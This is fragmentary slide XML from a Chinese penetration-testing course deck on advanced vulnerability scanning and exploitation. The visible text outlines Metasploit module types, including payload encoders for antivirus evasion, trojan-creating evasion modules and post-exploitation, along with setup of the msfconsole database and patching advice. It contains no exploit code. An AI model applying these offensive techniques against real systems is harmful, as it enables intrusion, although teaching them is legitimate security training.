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86" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="262" r:id="rId9"/>
    <p:sldId id="263" r:id="rId10"/>
    <p:sldId id="315" r:id="rId11"/>
    <p:sldId id="316" r:id="rId12"/>
    <p:sldId id="317" r:id="rId13"/>
    <p:sldId id="318" r:id="rId14"/>
    <p:sldId id="319" r:id="rId15"/>
    <p:sldId id="321" r:id="rId16"/>
    <p:sldId id="320" r:id="rId17"/>
    <p:sldId id="322" r:id="rId18"/>
    <p:sldId id="323" r:id="rId19"/>
    <p:sldId id="325" r:id="rId20"/>
    <p:sldId id="324" r:id="rId21"/>
    <p:sldId id="327" r:id="rId22"/>
    <p:sldId id="326" r:id="rId23"/>
    <p:sldId id="329" r:id="rId24"/>
    <p:sldId id="328" r:id="rId25"/>
    <p:sldId id="330" r:id="rId26"/>
    <p:sldId id="331" r:id="rId27"/>
    <p:sldId id="332" r:id="rId28"/>
    <p:sldId id="333" r:id="rId29"/>
    <p:sldId id="334" r:id="rId30"/>
    <p:sldId id="336" r:id="rId31"/>
    <p:sldId id="335" r:id="rId32"/>
    <p:sldId id="338" r:id="rId33"/>
    <p:sldId id="266" r:id="rId34"/>
    <p:sldId id="339" r:id="rId35"/>
    <p:sldId id="267" r:id="rId36"/>
    <p:sldId id="340" r:id="rId37"/>
    <p:sldId id="342" r:id="rId38"/>
    <p:sldId id="268" r:id="rId39"/>
    <p:sldId id="269" r:id="rId40"/>
    <p:sldId id="270" r:id="rId41"/>
    <p:sldId id="343" r:id="rId42"/>
    <p:sldId id="344" r:id="rId43"/>
    <p:sldId id="345" r:id="rId44"/>
    <p:sldId id="346" r:id="rId45"/>
    <p:sldId id="348" r:id="rId46"/>
    <p:sldId id="347" r:id="rId47"/>
    <p:sldId id="349" r:id="rId48"/>
    <p:sldId id="350" r:id="rId49"/>
    <p:sldId id="352" r:id="rId50"/>
    <p:sldId id="353" r:id="rId51"/>
    <p:sldId id="355" r:id="rId52"/>
    <p:sldId id="356" r:id="rId53"/>
    <p:sldId id="357" r:id="rId54"/>
    <p:sldId id="358" r:id="rId55"/>
    <p:sldId id="359" r:id="rId56"/>
    <p:sldId id="360" r:id="rId57"/>
    <p:sldId id="361" r:id="rId58"/>
    <p:sldId id="362" r:id="rId59"/>
    <p:sldId id="363" r:id="rId60"/>
    <p:sldId id="364" r:id="rId61"/>
    <p:sldId id="365" r:id="rId62"/>
    <p:sldId id="366" r:id="rId63"/>
    <p:sldId id="367" r:id="rId64"/>
    <p:sldId id="368" r:id="rId65"/>
    <p:sldId id="370" r:id="rId66"/>
    <p:sldId id="371" r:id="rId67"/>
    <p:sldId id="372" r:id="rId68"/>
    <p:sldId id="373" r:id="rId69"/>
    <p:sldId id="374" r:id="rId70"/>
    <p:sldId id="375" r:id="rId71"/>
    <p:sldId id="376" r:id="rId72"/>
    <p:sldId id="378" r:id="rId73"/>
    <p:sldId id="377" r:id="rId74"/>
    <p:sldId id="379" r:id="rId75"/>
    <p:sldId id="380" r:id="rId76"/>
    <p:sldId id="382" r:id="rId77"/>
    <p:sldId id="381" r:id="rId78"/>
    <p:sldId id="383" r:id="rId79"/>
    <p:sldId id="384" r:id="rId80"/>
    <p:sldId id="385" r:id="rId81"/>
    <p:sldId id="386" r:id="rId82"/>
    <p:sldId id="387" r:id="rId83"/>
    <p:sldId id="388" r:id="rId84"/>
    <p:sldId id="389" r:id="rId85"/>
    <p:sldId id="391" r:id="rId86"/>
    <p:sldId id="390" r:id="rId87"/>
    <p:sldId id="392" r:id="rId88"/>
    <p:sldId id="393" r:id="rId89"/>
    <p:sldId id="395" r:id="rId90"/>
    <p:sldId id="396" r:id="rId91"/>
    <p:sldId id="394" r:id="rId92"/>
    <p:sldId id="398" r:id="rId93"/>
    <p:sldId id="399" r:id="rId94"/>
    <p:sldId id="397" r:id="rId95"/>
    <p:sldId id="400" r:id="rId96"/>
    <p:sldId id="401" r:id="rId97"/>
    <p:sldId id="402" r:id="rId98"/>
    <p:sldId id="403" r:id="rId99"/>
    <p:sldId id="404" r:id="rId100"/>
    <p:sldId id="283" r:id="rId101"/>
    <p:sldId id="284" r:id="rId102"/>
    <p:sldId id="285" r:id="rId10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233"/>
        <p:guide pos="2882"/>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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tableStyles" Target="tableStyles.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/viewProps" Target="viewProps.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/presProps" Target="presProps.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0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1.png"/><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emf"/><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jpeg"/><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jpeg"/><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3.png"/><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4.jpeg"/><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5.png"/><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7.png"/><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png"/><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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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png"/><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1.png"/><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2.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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6.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7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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8.png"/></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8.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4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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7.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8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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0.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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8.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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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5.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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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7.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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8.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9.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.pn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0.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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1.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8.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2.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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3.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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4.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.pn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7.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.pn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8.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide9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1828800" y="1866900"/>
            <a:ext cx="8526145" cy="1994535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="25000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5550" b="1">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="16000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>项目五</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
              <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="16000" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
              </a:rPr>
              <a:t>漏洞扫描及利用进阶</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16000" b="1">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="10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180877"/>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模块介绍</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752600"/>
            <a:ext cx="1058799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(1)auxiliary：辅助模块，负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等辅助模块。</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(2)encoders：对payload进行加密，躲避AntiVirus检查的模块。</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(3)evasion：创建木马文件，功能上比较算是msfvenom的一个子功能的存在。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(4)exploits： 利用系统漏洞进行攻击的动作，此模块对应每一个具体漏洞的攻击方法（主动或被动）。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(5)payloads： 成功exploit后，真正的目标系统执行的代码或指令。</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分为3类payload，分别是single、stages和stagers。shellcode主要是特殊的payload。用于返回shell。</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3303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4010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47752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5437459" y="1412326"/>
            <a:ext cx="739142" cy="730069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="121920" tIns="60960" rIns="121920" bIns="60960" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1875">
                <a:solidFill>
                  <a:schemeClr val="lt1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>输入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1875">
              <a:solidFill>
                <a:schemeClr val="lt1">
                  <a:alpha val="100000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1875">
                <a:solidFill>
                  <a:schemeClr val="lt1">
                    <a:alpha val="100000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>标题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1875">
              <a:solidFill>
                <a:schemeClr val="l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6" name="Group 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="5059405" y="2721769"/>
            <a:ext cx="1495158" cy="1495158"/>
            <a:chOff x="5059405" y="2721769"/>
            <a:chExt cx="1495158" cy="1495158"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="AutoShape 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5059405" y="2721769"/>
              <a:ext cx="1495158" cy="1495158"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent1">
                <a:alpha val="100000"/>
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5437459" y="3133663"/>
              <a:ext cx="730613" cy="670735"/>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path>
                <a:path w="988" h="905">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path>
                <a:path w="988" h="905">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path>
                <a:path w="988" h="905">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path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6683524" y="2879180"/>
            <a:ext cx="2115722" cy="1204100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5167226" y="1395702"/>
            <a:ext cx="1278428" cy="1204100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5211870" y="1645737"/>
            <a:ext cx="1190320" cy="704031"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>减少溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834909" y="2867298"/>
            <a:ext cx="2115722" cy="1204100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3367975" y="3116983"/>
            <a:ext cx="1190320" cy="704730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>预防溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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AutoShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5169098" y="4385188"/>
            <a:ext cx="1278428" cy="1204100"/>
          </a:xfrm>
          <a:prstGeom prst="round2DiagRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1">
              <a:alpha val="100000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="497915" y="1376966"/>
            <a:ext cx="4432908" cy="1168993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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要想有效地预防由于系统或缓冲区溢出的漏洞产生的攻击，对于系统、程序开发人员来说，需要提高安全变成意识。</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497915" y="4366451"/>
            <a:ext cx="4432908" cy="1168993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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项目主要完成从网络渗透攻击的步骤、网络渗透中的漏洞扫描、分析漏洞并可以渗透win7系统、Oracle数据库溢出漏洞案例来进行讲述。</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6663690" y="4366260"/>
            <a:ext cx="4643120" cy="1169035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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系统管理员需要经常浏览系统供应商的网站，对系统和应用程序进行及时升级、安装漏洞补丁。</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6663717" y="1376966"/>
            <a:ext cx="4432908" cy="1168993"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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在应用程序这个环节减少缓冲区溢出的漏洞；对于系统管理员来说，需要经常与系统供应商联系，及时发现漏洞。</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5211870" y="4634873"/>
            <a:ext cx="1190320" cy="704730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>渗透攻击步骤</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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7146225" y="3116983"/>
            <a:ext cx="1190320" cy="704730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>及时升级打补丁</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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TextBox 2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180877"/>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模块介绍</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752600"/>
            <a:ext cx="1058799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(1)single：all in one。完整的payload，这些payload都是一体化的，不需要依赖外部的库和包。</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(2)stagers：目标计算机内存有限时，先传输一个较小的payload用于建立连接。</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(3)stages：利用stagers建立的连接下载后续的payload。</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(4)post：后期渗透模块。取得目标系统远程控制权后，进行一系列的后渗透攻击动作，如获取敏感信息、跳板攻击等操作。</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3303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4010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47752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180877"/>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752600"/>
            <a:ext cx="1058799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(1)Msfconsole启动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启</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动 Metasploit框架需要运行Postgresql数据库，现在只要运行Metasploit时都会自动启动 Postgresql数据库。如果数据库没启动的话，可以手动开启，下面时管理数据库的一些命令。Postgresql监听5432端口，如图5-2所示。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3303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4010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47752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8" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4246245" y="3733800"/>
            <a:ext cx="4228465" cy="1840865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="5791200"/>
            <a:ext cx="2166620" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-2 监听5432端口</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180877"/>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752600"/>
            <a:ext cx="1058799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(1)Msfconsole启动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查看一下端口状态，很明显，没监听端口，如图5-3所示。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3303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4010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47752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953000" y="5791200"/>
            <a:ext cx="3006725" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-3 查看一下端口状态</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 3"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2895600" y="2895600"/>
            <a:ext cx="6831965" cy="266763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180877"/>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752600"/>
            <a:ext cx="1058799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(1)Msfconsole启动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使用命令systemctl start postgresql.service重启服务，监听5432端口打开了，如图5-4所示。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3303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4010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47752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9" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2568575" y="2990850"/>
            <a:ext cx="7969885" cy="1901190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4953000" y="5105400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
